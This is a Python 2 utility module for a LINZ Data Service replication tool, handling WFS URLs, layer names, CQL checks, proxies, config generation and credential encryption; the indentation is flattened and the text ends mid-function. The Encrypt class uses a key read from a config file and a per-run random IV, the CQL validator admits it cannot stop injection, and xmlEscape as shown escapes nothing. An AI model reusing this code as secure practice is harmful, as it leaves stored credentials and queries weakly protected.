Created on 9/08/2012
@author: jramsay
'''
# for windows lxml binary from here http://www.lfd.uci.edu/~gohlke/pythonlibs/#lxml
import re
import os
import sys
import logging
import ast
import urllib
import traceback
from string import whitespace
from urllib2 import urlopen, build_opener, install_opener, ProxyHandler
from contextlib import closing
from StringIO import StringIO
from lxml import etree
from multiprocessing import Process, Queue
from functools import wraps, partial
#ldslog = LDSUtilities.setupLogging()
mainlog = 'DEBUG'
ldslog = logging.getLogger(mainlog)
LDS_READ_TIMEOUT = 300 # 5min
MACRON_SUBST = {'ā':'a','ē':'e','ī':'i','ō':'o','ū':'u'}
class ReadTimeoutException(Exception):
def __init__(self,em,ll=ldslog.error): super(ReadTimeoutException,self).__init__(em); ll('{} - {}'.format(type(self).__name__,em))
class LDSUtilities(object):
'''Does the LDS related stuff not specifically part of the datastore'''
LDS_VX_PREFIX = 'v:x'
#wfs2.0 prefixes
LDS_LL_PREFIX = 'linz:layer-'
LDS_DL_PREFIX = 'data.linz.govt.nz:layer-'
LDS_DT_PREFIX = 'data.linz.govt.nz:table-'
LDS_DX_PREFIX = 'data.linz.govt.nz:'
LDS_ME_PREFIX = 'mfe:layer-'
LORT = ['table','layer'] #variations on idp for finding layer/table names in LC
LDS_PREFIXES = (LDS_VX_PREFIX,LDS_LL_PREFIX,LDS_DL_PREFIX,LDS_DT_PREFIX,LDS_ME_PREFIX)
@staticmethod
def getLDSIDPrefix(ver,svc):
from lds.DataStore import UnsupportedServiceException
if svc=='WFS':
if ver in ('1.0.0','1.1.0','1.0','1.1'):
return LDSUtilities.LDS_VX_PREFIX
elif ver in ('2.0.0','2.0'):
#return LDSUtilities.LDS_LL_PREFIX
return LDSUtilities.LDS_DX_PREFIX
else:
raise UnsupportedServiceException('Only WFS versions 1.0, 1.1 and 2.0 are supported')
else:
raise UnsupportedServiceException('Only WFS is supported at present')
@staticmethod
def adjustWFS2URL(url,ver):
if ver == '2.0.0':
url = re.sub('wfs\.','',url)#+'services;key='
ldslog.warn('\'wfs.\' deleted from URL to comply with LDS WFS2.0 requirements')
return url
@staticmethod
def splitLayerName(layername):
'''Splits a layer name typically in the format v:x### into /v/x### for URI inclusion'''
#return "/"+"/".join(layername.split(":"))
return "/"+re.sub(":","/",layername)
LDS_VXPATH = splitLayerName.__func__(LDS_VX_PREFIX)
LDS_LLPATH = splitLayerName.__func__(LDS_LL_PREFIX)#?
LDS_MEPATH = splitLayerName.__func__(LDS_ME_PREFIX)#?
LDS_IDPATHS = (LDS_VXPATH,LDS_LLPATH,LDS_MEPATH)
@staticmethod
def standardiseLayername(layername):
'''Removes changeset identifier from layer name and adds 'the' prefix if its not already there'''
if not re.search(LDSUtilities.LDS_DX_PREFIX,layername): layername = '{}{}'.format(LDSUtilities.LDS_DX_PREFIX,layername)
return re.sub('-changeset$','',layername)
@staticmethod
def checkDateFormat(xdate):
'''Checks a date parameter conforms to yyyy-MM-ddThh:mm:ss format'''
#why not just use... datetime.strptime(xdate,'%Y-%m-%dT%H:%M:%S')
if type(xdate) is str:
if re.search('^\d{4}\-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}$',xdate):
return xdate
elif re.search('^\d{4}\-\d{2}-\d{2}$',xdate):
return xdate+"T00:00:00"
return None
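# Hedged sketch (added for illustration, not part of the original class): the
# datetime.strptime-based alternative hinted at in the comment above. It accepts the same two
# input shapes as checkDateFormat and returns the same normalised string, or None.
@staticmethod
def checkDateFormatStrptime(xdate):
    from datetime import datetime
    for fmt, suffix in (('%Y-%m-%dT%H:%M:%S', ''), ('%Y-%m-%d', 'T00:00:00')):
        try:
            datetime.strptime(xdate, fmt)
            return xdate + suffix
        except (TypeError, ValueError):
            continue
    return None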
# 772 time test string
# http://wfs.data.linz.govt.nz/ldskey/v/x772-changeset/wfs?service=WFS&version=1.0.0&request=GetFeature&typeName=v:x772-changeset&viewparams=from:2012-09-29T07:00:00;to:2012-09-29T07:30:00&outputFormat=GML2
@staticmethod
def checkLayerName(lconf,lname):
'''Makes sure a layer name conforms to v:x format which exists or matches a layername'''
from lds.DataStore import InvalidLayerException
if type(lname) in (str,unicode):
lname = LDSUtilities.recode(lname)
#if its an ID (v:x etc) and it matches a configured id return it
if LDSUtilities.checkLayerNameValidity(lname) and lname in [l[0] for l in lconf.getLayerNames()]: return lname
#if its a name eg (NZ Special Points) return matching ID
lid = lconf.findLayerIdByName(lname)
if lid: return lid
else: raise InvalidLayerException('Cannot find Layer, '+lname)
else:
raise InvalidLayerException('Layer name not a string, '+str(lname))
return None
@staticmethod
def checkLayerNameValidity(lname):
'''check whether provided layer name is v:x, linz:layer- or mfe:layer-'''
return True if [x for x in LDSUtilities.LDS_PREFIXES if re.search('^{}\d+$'.format(x),lname)] else False
@staticmethod
def interceptSystemProxyInfo(proxyinfo,sys_ref):
(ptype, host, port, auth, usr, pwd) = proxyinfo
if LDSUtilities.assessNone(ptype) == sys_ref:
#system, read from env/reg
if os.name == 'nt':
#windows
from lds.WinUtilities import Registry as WR
(_,host,port) = WR.readProxyValues()
else:
#unix etc
hp = os.environ['http_proxy']
rm = re.search('http://([a-zA-Z0-9_\.\-]+):(\d+)',hp)
host = rm.group(1)
port = rm.group(2)
return {'TYPE':ptype, 'HOST':host, 'PORT':port, 'AUTH':auth, 'USR':usr, 'PWD':pwd}
@staticmethod
def getLayerNameFromURL(url):
'''checks for both /v/xNNN and v:xNNN occurrences and whether they're the same'''
from DataStore import MalformedConnectionString
l1 = next((re.search(x+'(\d+)',url,flags=re.IGNORECASE) for x in LDSUtilities.LDS_IDPATHS if re.search(x+'(\d+)',url,flags=re.IGNORECASE)), None)
l2 = next((re.search('typeName='+x+'(\d+)',url,flags=re.IGNORECASE) for x in LDSUtilities.LDS_PREFIXES if re.search('typeName='+x+'(\d+)',url,flags=re.IGNORECASE)), None)
if l1 is None or l2 is None:
raise MalformedConnectionString('Cannot extract correctly formatted layer strings from URI')
else:
l1 = l1.group(1)
l2 = l2.group(1)
if l1!=l2:
raise MalformedConnectionString('Layer specifications in URI differ; '+str(l1)+'!='+str(l2))
pref = [x for x in LDSUtilities.LDS_PREFIXES if re.search('typeName='+x+'(\d+)',url,flags=re.IGNORECASE)][0]
return pref+str(l1)
@staticmethod
def checkHasChangesetIdentifier(url):
'''Check whether URL contains changeset id'''
c1 = [x for x in LDSUtilities.LDS_IDPATHS if re.search(x+'\d+-changeset',url,flags=re.IGNORECASE)]
c2 = [x for x in LDSUtilities.LDS_PREFIXES if re.search('typeName='+x+'\d+-changeset',url,flags=re.IGNORECASE)]
return True if c1 and c2 else False#return c1 and c2
@staticmethod
def getDateStringFromURL(fort,url):
'''Parse a selected date string from a user supplied URL. Can return none as that would indicate non incremental'''
#yeah thats right, ForT = F(rom) or T(o)
udate = re.search(fort+':(\d{4}-\d{2}-\d{2}(T\d{2}:\d{2}:\d{2})*)',url)
return udate
@staticmethod
def xmlEscape(url):
'''Simple XML escaping regex used to properly format WFS URLS (wfs specs ask for it but it doesn't seem to be needed)'''
#first 4, simple replace: "=" '=' <=< >=> &=&
url = re.sub('"','"',url)
url = re.sub('\'',''',url)
url = re.sub('<','<',url)
url = re.sub('>','>',url)
#them match & but not anything that has already been escaped
#the original string could also contain escaped chars so we have to do skip escapes anyway
return re.sub('&(?!amp;|apos;|quot;|lt;|gt;)','&',url)
@staticmethod
def percentEncode(url):
'''Simple http bracket/comma escaping regex used to properly format WFS URLS'''
#this is the full list but we should only need a small subset of these, i.e. brackets, spaces and commas
# ! # $ & ' ( ) * + , / : ; = ? @ [ ]
#%20 %21 %23 %24 %26 %27 %28 %29 %2A %2B %2C %2F %3A %3B %3D %3F %40 %5B %5D
fpe = {' ':'%20','!':'%21','#':'%23','$':'%24','&':'%26',"'":'%27','\(':'%28','\)':'%29','\*':'%2A','\+':'%2B',',':'%2C','/':'%2F',':':'%3A',';':'%3B','=':'%3D','\?':'%3F','@':'%40','\[':'%5B','\]':'%5D'}
rpe = {' ':'%20','\(':'%28','\)':'%29',',':'%2C'}
for k in rpe:
url = re.sub(k,rpe[k],url)
#url = re.sub('\(','%28',url)
#url = re.sub('\)','%29',url)
#url = re.sub(',','%2C',url)
#url = re.sub(' ','%20',url)
return url
@staticmethod
def reVersionURL(url,newversion='1.1.0'):
'''Because there is sometimes a problem with WFS <1.0.0, esp GetFeatureCount, change to WFS 1.1.0 (or whatever the user wants)'''
ldslog.warn('Rewriting URI version to '+str(newversion))
return re.sub('&version=[0-9\.]+','&version='+str(newversion),url)
@staticmethod
def containsOnlyAlphaNumeric(anstr):
'''Checks for non-alphanumeric characters in a string, for schema/table name testing'''
#also allows underscore
return re.search('[^a-zA-Z0-9_]',anstr) is None
@staticmethod
def checkCQL(cql):
'''Since CQL commands are freeform strings we need to try and validate at least the most basic errors. This is very simple
RE matcher that just looks for valid predicates... for now. Won't stop little Bobby Tables
<predicate> ::= <comparison predicate> | <text predicate> | <null predicate> | <temporal predicate> | <classification predicate> | <existence_predicate> | <between predicate> | <include exclude predicate>
LDS expects the following;
Was expecting one of:
"not" ...
"include" ...
"exclude" ...
"(" ...
"[" ...
"id" ...
"in" ...
<IDENTIFIER> ...
"-" ...
<INTEGER_LITERAL> ...
<FLOATING_LITERAL> ...
<STRING_LITERAL> ...
<STRING_LITERAL> "*" ...
<STRING_LITERAL> "/" ...
<STRING_LITERAL> "+" ...
<STRING_LITERAL> "-" ...
<STRING_LITERAL> "not" ...
<STRING_LITERAL> "like" ...
<STRING_LITERAL> "exists" ...
<STRING_LITERAL> "does-not-exist" ...
<STRING_LITERAL> "is" ...
<STRING_LITERAL> "between" ...
<STRING_LITERAL> "before" ...
<STRING_LITERAL> "after" ...
<STRING_LITERAL> "during" ...
<STRING_LITERAL> "=" ...
<STRING_LITERAL> ">" ...
<STRING_LITERAL> "<" ...
<STRING_LITERAL> ">=" ...
<STRING_LITERAL> "<=" ...
<STRING_LITERAL> "<>"
'''
v = 0
#comp pred
if re.match('.*(?:!=|=|<|>|<=|>=)',cql):
v+=1
#text pred
if re.match('.*(?:not\s*)?like.*',cql,re.IGNORECASE):
v+=2
#null pred
if re.match('.*is\s*(?:not\s*)?null.*',cql,re.IGNORECASE):
v+=4
#time pred
if re.match('.*(?:before|during|after)',cql,re.IGNORECASE):
v+=8
#clsf pred, not defined
#exst pred
if re.match('.*(?:does-not-)?exist',cql,re.IGNORECASE):
v+=32
#btwn pred
if re.match('.*(?:not\s*)?between',cql,re.IGNORECASE):
v+=64
#incl pred
if re.match('.*(?:include|exclude)',cql,re.IGNORECASE):
v+=128
#geo predicates just for good measure, returns v=16 overriding classification pred
if re.match('.*(?:equals|disjoint|intersects|touches|crosses|within|contains|overlaps|bbox|dwithin|beyond|relate)',cql,re.IGNORECASE):
v+=16
ldslog.debug("CQL check:"+cql+":"+str(v))
if v>0:
return cql
else:
return ""
@staticmethod
def precedence(first,second,third):
'''Decide which CQL filter to apply based on scope and availability'''
'''Generally assume; CommandLine > Config-File > Layer-Properties but maybe its better for individual layers to override a global setting... '''
if LDSUtilities.assessNone(first):
return first
elif LDSUtilities.assessNone(second):
return second
elif LDSUtilities.assessNone(third):
return third
return None
@staticmethod
def extractFields(feat):
'''Extracts named fields from a layer config feature'''
'''Not strictly independent but common and potentially used by a number of other classes'''
try:
id = feat.GetField('ID')
except:
ldslog.debug("LayerSchema: Can't read Feature ID")
id = None
try:
pkey = feat.GetField('PKEY')
except:
ldslog.debug("LayerSchema: No Primary Key Column defined, default to 'ID'")
pkey = 'ID'
'''names are/can-be stored so we can reverse search by layer name'''
try:
name = feat.GetField('NAME')
except:
ldslog.debug("LayerSchema: No Name saved in config for this layer, returning ID")
name = None
'''names are/can-be stored so we can reverse search by layer name'''
try:
group = feat.GetField('CATEGORY')
except:
ldslog.debug("Group List: No Groups defined for this layer")
group = None
try:
gcol = feat.GetField('GEOCOLUMN')
except:
ldslog.debug("LayerSchema: No Geo Column defined, default to 'SHAPE'")
gcol = 'SHAPE'
try:
index = feat.GetField('INDEX')
except:
ldslog.debug("LayerSchema: No Index Column/Specification defined, default to None")
index = None
try:
epsg = feat.GetField('EPSG')
except:
#print "No Projection Transformation defined"#don't really need to state the default occurance
epsg = None
try:
lmod = feat.GetField('LASTMODIFIED')
except:
ldslog.debug("LayerSchema: No Last-Modified date recorded, successful update will write current time here")
lmod = None
try:
disc = feat.GetField('DISCARD')
except:
disc = None
try:
cql = feat.GetField('CQL')
except:
cql = None
return LayerConfEntry(id,pkey,name,group,gcol,epsg,lmod,disc,cql)
@staticmethod
def standardiseDriverNames(dname=''):
'''Returns standard identifier (defined by DRIVER_NAME) for different dests'''
dname = dname.lower()
from DataStore import DataStore
if re.match('pg|postgres',dname):
return DataStore.DRIVER_NAMES['pg']
elif re.match('ms|microsoft|sqlserver',dname):
return DataStore.DRIVER_NAMES['ms']
elif re.match('sl|sqlite|spatialite',dname):
return DataStore.DRIVER_NAMES['sl']
elif re.match('fg|filegdb|esri',dname):
return DataStore.DRIVER_NAMES['fg']
elif re.match('wfs|lds',dname):
#since a user could ask for lds meaning wfs though this will have to change if we implement wms etc TODO
from lds.WFSDataStore import WFSDataStore
return WFSDataStore.DRIVER_NAME
return None
@staticmethod
def getRuntimeEnvironment():
for line in traceback.format_stack():
if re.search('qgis', line.strip()): return 'QGIS'
return 'STANDALONE'
@staticmethod
def timedProcessRunner(process,args,T):
'''For processes that are inclined to hang, stick them in new process and time them out'''
timeout = T if T else LDS_READ_TIMEOUT
pn = process.__name__
#HACK to get around windows no-method-pickling rule
if re.search('readLDS',pn) and re.search('win',sys.platform): process = _readLDS
q = Queue()
p = Process(name=pn,target=process,args=(args,q))
p.daemon = False
ldslog.debug('Timed Process {} on {} with {}'.format(process.__name__,sys.platform,args))
p.start()
p.join(timeout=timeout)
if p.is_alive():
ldslog.debug('Process {} Timeout Exceeded'.format(pn))
p.terminate()
q.close()
fn = args[0].__name__ if hasattr(args[0], '__call__') else pn
raise ReadTimeoutException('No Response from {} with timeout={}s'.format(fn,timeout))
else:
res = q.get()
q.close()
if isinstance(res,Exception):
raise ReadTimeoutException(LDSUtilities.errorMessageTranslate(res))
return res
@staticmethod
def wrapWorker(fanda,q):
'''Generic wrapper function returning results via queue. Used for system calls
1. Calls to wF must provide the function-to-call as the first arg in a tuple, remaining args are function args
2. Because we cant raise an error to the main thread pass exception back in queue
3. Unable to pass back data in queue, cannot Pickle. SwigPy specifically'''
#print '>>fanda',fanda
try:
q.put(fanda[0](*fanda[1:]) if len(fanda)>1 else fanda[0]())
except Exception as e:
q.put(e)
return
@staticmethod
#also thwarted by SwigPy - pickle
def wrapSTOWorker(sto,q):
'''Generic wrapper function returning results via queue. Used for system calls
1. Calls to wF must provide the function-to-call as the first arg in a tuple, second arg is return object, remaining args are function args
2. Because we cant raise an error to the main thread pass exception back in queue
3. Unable to pass back data in queue, cannot Pickle. SwigPy specifically'''
#print '>>sto',sto
try:
sto.setResult(sto.method(*sto.args) if sto.args else sto.method())
q.put(sto)
except Exception as e:
q.put(e)
return
@staticmethod
def readLDS(up,q):
'''Simple LDS reader to be used in a timed worker thread context'''
(u,p) = up
ldslog.debug("LDS URL {} using Proxy {}".format(u,p))
if LDSUtilities.isProxyValid(p): install_opener(build_opener(ProxyHandler(p)))
with closing(urlopen(u)) as lds:
q.put(lds.read())
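# Hedged usage notes (comments only, added for illustration; url/pxy/some_func are placeholders):
# timedProcessRunner runs a queue-aware worker in its own Process and times it out after T seconds, e.g.
#   raw = LDSUtilities.timedProcessRunner(LDSUtilities.readLDS, (url, pxy), 60)
# and wrapWorker adapts an ordinary callable to that queue-based protocol:
#   res = LDSUtilities.timedProcessRunner(LDSUtilities.wrapWorker, (some_func, arg1, arg2), 60)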
@staticmethod
def isProxyValid(pxy):
'''Return TF whether the proxy definition is any good. TODO add other conditions'''
return LDSUtilities.assessNone(pxy) and pxy.values()!=[':']
@staticmethod
def convertBool(sbool):
'''Returns the bool representation of a T/F string or failing that whatever bool func thinks'''
if isinstance(sbool,str) or isinstance(sbool,unicode):
if sbool.lower() in ['true','t','yes','y']:
return True
elif sbool.lower() in ['false','f','no','n']:
return False
return bool(sbool)
@staticmethod
def assessNone(nstr):
'''Doesn't cover all possibilities but accounts for most read-from-file (string) problems. Lists treated as ANY(None)->None'''
#for when integers slip through and zeroes get represented as none
if isinstance(nstr,int):
ldslog.warn('Converting Integer {} to String for null comparison'.format(nstr))
return str(nstr)
if isinstance(nstr,tuple) or isinstance(nstr,list):
return None if any(not LDSUtilities.assessNone(i) for i in nstr) else nstr
elif isinstance(nstr,dict):
#Case for dicts that have no valid values, may not be whats wanted
return None if any(not LDSUtilities.assessNone(i) for i in nstr.values()) else nstr
elif isinstance(nstr,str) and (nstr == 'None' or nstr == '' or all(i in whitespace for i in nstr)):
return None
elif isinstance(nstr,unicode) and (nstr == u'None' or nstr == u'' or all(i in whitespace for i in nstr)):
return None
#if its already none this will return itself
return nstr
'''Enumeration method'''
@staticmethod
def enum(*sequential, **named):
#http://stackoverflow.com/questions/36932/how-can-i-represent-an-enum-in-python
enums = dict(zip(sequential, range(len(sequential))), **named)
reverse = dict((value, key) for key, value in enums.iteritems())
enums['reverse'] = reverse
return type('Enum', (), enums)
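# Hedged usage note (comments only, added for illustration): the enum helper builds a throwaway
# class with named integer constants plus a 'reverse' lookup dict, e.g.
#   Proto = LDSUtilities.enum('WFS', 'WMS', WCS=10)
#   Proto.WFS          # -> 0
#   Proto.WCS          # -> 10
#   Proto.reverse[0]   # -> 'WFS'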
@staticmethod
def setupLogging(lf=mainlog,ll=logging.DEBUG,ff=1):
formats = {1:'%(asctime)s - %(levelname)s - %(module)s %(lineno)d - %(message)s',
2:':: %(module)s %(lineno)d - %(message)s',
3:'%(asctime)s,%(message)s'}
log = logging.getLogger(lf)
log.setLevel(ll)
path = os.path.normpath(os.path.join(os.path.dirname(__file__), "../log/"))
if not os.path.exists(path):
os.mkdir(path)
df = os.path.join(path,lf.lower()+'.log')
fh = logging.FileHandler(df,'w')
fh.setLevel(logging.DEBUG)
formatter = logging.Formatter(formats[ff])
fh.setFormatter(formatter)
log.addHandler(fh)
return log
@staticmethod
def standardiseLayerConfigName(layerprefix):
'''Standardise to a layer config file name and check if it exists'''
LP = '.layer.properties'
layerprefix = LDSUtilities.standardiseDriverNames(layerprefix).lower()
base = os.path.basename(layerprefix)
filename = base + ('' if re.search(LP+'$', base) else LP)
return os.path.abspath(os.path.join(os.path.dirname(__file__),'../conf/',filename))
@classmethod
def checkForLayerConfig(cls,layerprefix):
'''Get standardised layer config file name and check if it exists'''
lpath = cls.standardiseLayerConfigName(layerprefix)
return lpath if os.path.exists(lpath) else None
@staticmethod
def standardiseUserConfigName(userprefix):
'''Standardise to a user config file name'''
UP = '.conf'
base = os.path.basename(str(userprefix))
filename = base + ('' if re.search(UP+'$', base) else UP)
return os.path.abspath(os.path.join(os.path.dirname(__file__),'../conf/',filename))
@classmethod
def checkForUserConfig(cls,userprefix):
'''Get standardised user config file name and check if it exists'''
upath = cls.standardiseUserConfigName(userprefix)
return upath if os.path.exists(upath) else None
@staticmethod
def errorMessageTranslate(msg):
'''Convenience function to provide more informative error messages'''
searchreplace = [('Failed\swriting\sbody','1.Unable to fetch data over network connection. Possible timeout'),
('something illegible','2.something sensible')]
newmsg = [a[1] for a in searchreplace if re.search(a[0],msg,re.IGNORECASE)]
return '*{}*\n{}'.format(newmsg[0],msg) if newmsg else msg
@staticmethod
def sanitise(name):
'''Manually substitute potential table naming errors implemented as a common function to retain naming convention across all outputs.
No guarantees are made that this feature won't cause naming conflicts e.g. A-B-C -> a_b_c <- a::{b}::c'''
#append _ to name beginning with a number (NB \A = ^ for non multiline)
if re.match('\A\d',name):
name = "_"+name
#replace unwanted chars with _ and compress multiple and remove trailing
sanitised = re.sub('_+','_',re.sub('[ \-,.\\\\/:;{}()\[\]]','_',name.lower())).rstrip('_')
#unexpected name substitutions can be a source of bugs, log as debug
ldslog.debug("Sanitise: raw="+name+" name="+sanitised)
return sanitised
'''
NOTE
unicode.encode() -> bytes
bytes.decode() -> unicode
'''
@staticmethod
def recodeForDriver(ustr,driver=None,code='decode'):
'''Change encoding for drivers that dont support unicode. Not used/needed anymore?'''
if driver=='fg': return ustr.encode('iso-8859-1')
if driver=='pg': return ustr.encode('iso-8859-1')
return ustr.encode('utf-8')
@staticmethod
def recode(val,code='utf8',uflag='decode'):
'''Does unicode decoding (encoding) or just strips out macronated chars'''
tv = ( type(val)==unicode )
if val:
if uflag == 'decode':
'''Decode turning ascii coded strings into unicode'''
return val if tv else val.decode(code)
elif uflag == 'encode':
'''Encode, converting unicode into ascii'''
return val.encode(code) if tv else val
elif uflag=='subst':
'''Macron substitutions used in CreateLayer but keeps val as unicode'''
repx = dict((re.escape(k), v) for k, v in MACRON_SUBST.iteritems())
pattern = re.compile("|".join(repx.keys()))
return pattern.sub(lambda m: repx[re.escape(m.group(0))], val)
elif uflag=='compat':
'''Make the string really compatible, substitute macrons and encode then str()'''
return str(LDSUtilities.recode(LDSUtilities.recode(val,code,uflag='encode'),code,uflag='subst'))
return val
@staticmethod
def treeDecode(lcl,code='utf8',uflag='decode'):
'''Convenience list element-by-element decoder'''
#return [LDSUtilities.treeDecode(i, code) if isinstance(i,list) or isinstance(i, tuple) else ((i.decode(code) if uflag=='decode' else i.encode(code)) if i else None) for i in lcl]
return [LDSUtilities.treeDecode(i,code,uflag) if isinstance(i,(list,tuple)) else (LDSUtilities.recode(i,code,uflag) if i else None) for i in lcl]
@staticmethod
def treeEncode(lcl,code='utf8',eord=False):
return LDSUtilities.treeDecode(lcl, code, eord)
@staticmethod
def unicodeCompare(str1,str2):
return LDSUtilities.recode(str1) == LDSUtilities.recode(str2)
@staticmethod
def sysPathAppend(plist):
'''Append library paths to sys.path if missing'''
for p in [os.path.realpath(p) for p in plist]:
if p not in sys.path:
sys.path.insert(0, p)
class DirectDownload(object):
def __init__(self,url,file):
self.url = url
self.file = file
def download(self):
urllib.urlretrieve(self.url, self.file)
class FileResolver(etree.Resolver):
def resolve(self, url, pubid, context):
return self.resolve_filename(url, context)
class ConfigInitialiser(object):
'''Initialises configuration, for use at first run'''
@staticmethod
def buildConfiguration(capsurl, wfs_ver,jorf, idp):
'''Given a destination DS use this to select an XSL transform object and generate an output document that will initialise a new config file/table'''
#file name subst for testing
#capsurl='http://data.linz.govt.nz/services;key=<api-key>/wfs?service=WFS&version=2.0.0&request=GetCapabilities'
#capsurl='http://data.linz.govt.nz/services;key=<api-key>/wfs?service=WFS&version=1.1.0&request=GetCapabilities'
#xslfile='~/git/LDS/LDSReplicate/conf/getcapabilities-wfs2.0.json.xsl'
#xslfile='~/git/LDS/LDSReplicate/conf/getcapabilities-wfs1.1.json.xsl'
parser = etree.XMLParser(recover=True, huge_tree=True)
parser.resolvers.add(FileResolver())
wfspart = '-wfs{}'.format(wfs_ver)
jorfpart = 'json' if jorf else 'file'
xslfile = os.path.join(os.path.dirname(__file__), '../conf/getcapabilities{}.{}.xsl'.format(wfspart,jorfpart))
xml = etree.parse(capsurl,parser)
xsl = etree.parse(xslfile,parser)
#this is a problem that seems to only affect eclipse, running from CL or the final bin is fine
#FT = xml.findall('//{http://www.opengis.net/wfs/2.0}FeatureType')
#KY = xml.findall('//{http://www.opengis.net/ows/1.1}Keywords/{http://www.opengis.net/ows/1.1}Keyword')
#TX = xsl.findall('//{http://www.w3.org/1999/XSL/Transform}text')
#print 'FT',len(FT)#,FT,[l.text for l in FT]
#print 'KY',len(KY)#,KY,[l.text for l in KY]
#print 'TX',len(TX)#,TX,[l.text for l in TX]
transform = etree.XSLT(xsl)
result = transform(xml,profile_run=True)
ldslog.info('Parsed GC '+unicode(result)+'/'+str(result.xslt_profile))
return (ConfigInitialiser._hackPrimaryKeyFieldJSON if jorf else ConfigInitialiser._hackPrimaryKeyFieldCP)(unicode(result),idp)
@staticmethod
def cleanCP(cp):
'''Make sure the ConfigParser is empty... even needed?'''
for sec in cp.sections():
cp.remove_section(sec)
@staticmethod
def _hackPrimaryKeyFieldCP(cpdoc,idp,csvfile=os.path.join(os.path.dirname(__file__),'../conf/ldspk.csv')):
'''temporary hack method to rewrite the layerconf primary key field for ConfigParser file types using Koordinates supplied PK CSV'''
import io
from ConfigParser import ConfigParser, NoSectionError
cp = ConfigParser()
#read CP from GC doc
cp.readfp(io.BytesIO(LDSUtilities.recode(cpdoc,uflag='encode')))#str(cpdoc
#read the PK list writing any PK's found into CP
for item in ConfigInitialiser.readCSV(csvfile):
try:
ky = item[2].replace('ogc_fid','').replace('"','').lstrip()
for lt in LDSUtilities.LORT:
ly = str(idp+lt+'-'+item[0])
#cant have a pk named ogc_fid since this is created automatically by the database, creating a new one crashes
if cp.has_section(ly):
cp.set(ly,'pkey',ky)
ldslog.debug('Setting PK on layer. '+ly+'//'+ky)
break
else:
raise NoSectionError('No section matching '+idp+'|'.join(LDSUtilities.LORT)+'-'+item[0])
except NoSectionError as nse:
ldslog.warn('PK hack CP: '+str(nse)+ly+'//'+ky)
#CP doesn't have a simple non-file write method?!?
cps = "# LDS Layer Properties Initialiser - File\n"
for section in cp.sections():
#ldslog.critical('writing >>>'+str(section))
cps += "\n["+str(section)+"]\n"
for option in cp.options(section):
cps += str(option)+": "+str(cp.get(section, option))+"\n"
return cps
@staticmethod
def _hackPrimaryKeyFieldJSON(jtext,idp,csvfile=os.path.join(os.path.dirname(__file__),'../conf/ldspk.csv')):
'''temporary hack method to rewrite the layerconf primary key field in JSON responses'''
import json
jdata = json.loads(jtext)
for item in ConfigInitialiser.readCSV(csvfile):
for jline in jdata:
if idp+item[0] == str(jline[0]):
jline[1] = item[2].replace('"','').lstrip()
return json.dumps(jdata)
@staticmethod
def readCSV(csvfile=os.path.join(os.path.dirname(__file__),'../conf/ldspk.csv')):
'''Look for PK assigments in the Koordinates supplied csv'''
import csv
res = []
with open(csvfile, 'rb') as csvtext:
reader = csv.reader(csvtext, delimiter=',', quotechar='"')
reader.next()
for line in reader:
res.append(line)
return res
@staticmethod
def getConfFiles(confdir=os.path.join(os.path.dirname(__file__),'../conf/')):
from lds.ReadConfig import MainFileReader as MF
return sorted([f.split('.')[0] for f in os.listdir(confdir) if re.search('(?!^'+MF.DEFAULT_MF+'$)^.+\.conf$',f)])
class SUFIExtractor(object):
'''XSL parser to read big int columns returning a dict of id<->col matches'''
@staticmethod
def readURI(xml,colname):
p = os.path.join(os.path.dirname(__file__), '../conf/sufiselector.xsl')
with open(p,'r') as sufireader:
converter = sufireader.read()
xslt = etree.XML(converter.replace('#REPLACE',colname))
transform = etree.XSLT(xslt)
doc = etree.parse(StringIO(xml))
res = transform(doc)
sufi = ast.literal_eval(str(res))
#ldslog.debug(sufi)
return sufi
class FeatureCounter(object):
'''XSL parser to read big int columns returning a dict of id<->col matches'''
@staticmethod
def readCount(xml):
p = os.path.join(os.path.dirname(__file__), '../conf/featurecounter.xsl')
with open(p,'r') as featcount:
converter = featcount.read()
xslt = etree.XML(converter)
transform = etree.XSLT(xslt)
doc = etree.parse(StringIO(xml))
res = transform(doc)
fcval = ast.literal_eval(str(res))
return fcval
class Encrypt(object):
from lds.ReadConfig import MainFileReader
ENC_PREFIX = "ENC:"
#SbO, not secret at all actually
p = LDSUtilities.standardiseUserConfigName(MainFileReader.DEFAULT_MF)
with open(p,'r') as confile:
lds = confile.readline(16)
from Crypto import Random
ivstr = Random.get_random_bytes(16)
@classmethod
def secure(cls,plaintext):
import base64
from Crypto.Cipher import AES
aes = AES.new(cls.lds, AES.MODE_CBC, cls.ivstr)
sec = base64.b64encode(aes.encrypt(Encrypt._pad(plaintext)))
return sec
@classmethod
def unSecure(cls,sectext):
import base64
from Crypto.Cipher import AES
aes = AES.new(cls.lds, AES.MODE_CBC, cls.ivstr)
plain = Encrypt._strip(aes.decrypt(base64.b64decode(sectext)))
return plain
@staticmethod
def _pad(sectext):
import random
pn = 15-len(sectext)%16
pad = '' if pn==0 else str(random.randint(10**(pn-1),10**pn-1))
return sectext+pad+hex(pn)[2:]#.lstrip('0x') doesn't work for 0x0
@staticmethod
def _strip(padtext):
pn = padtext[-1]
return padtext[:len(padtext)-int(pn,16)-1]
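# Hedged illustration (added, not part of the original class): a round-trip check showing that
# _strip undoes _pad and that the padded length is always a multiple of 16, which is what
# AES.MODE_CBC requires.
@staticmethod
def _pad_roundtrip_example(plaintext='my secret'):
    padded = Encrypt._pad(plaintext)
    assert len(padded) % 16 == 0
    assert Encrypt._strip(padded) == plaintext
    return padded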
#this is the only class that emits LCE objects and, as a utility module, we don't want to be adding dependencies, so LCE belongs here
class LayerConfEntry(object):
'''Storage class for layer config info'''
def __init__(self,id,pkey,name,group,gcol,epsg,lmod,disc,cql):
self.id = id
self.pkey = pkey
self.name = name
self.group = group
self.gcol = gcol
self.epsg = epsg
self.lmod = lmod
self.disc = disc
self.cql = cql
self.ascii_name = LDSUtilities.recode(self.name,uflag='subst')
def __str__(self):
return 'LCE {}={} - {}'.format(self.pkey if LDSUtilities.assessNone(self.pkey) else '_id', self.id, self.name)
def _readLDS(up,q):
'''Simple LDS reader to be used in a timed worker thread context.
COPY OF LDSU.readLDS METHOD'''
(u,p) = up
ldslog.debug("_LDS URL {} using Proxy {}".format(u,p))
if LDSUtilities.isProxyValid(p): install_opener(build_opener(ProxyHandler(p)))
with closing(urlopen(u)) as lds:
q.put(lds.read())
class Debugging(object):
#simple decorator logging called func
@classmethod
def dmesg(cls,func=None, prefix=''):
if func is None:
return partial(Debugging.dmesg, prefix=prefix)
msg = '<m{}> {}'.format(prefix,cls._qname(func.__name__))
@wraps(func)
def wrapper(*args, **kwargs):
ldslog.info(msg)
return func(*args, **kwargs)
return wrapper
#logs function args
@classmethod
def darg(cls,func=None, prefix=''):
if func is None:
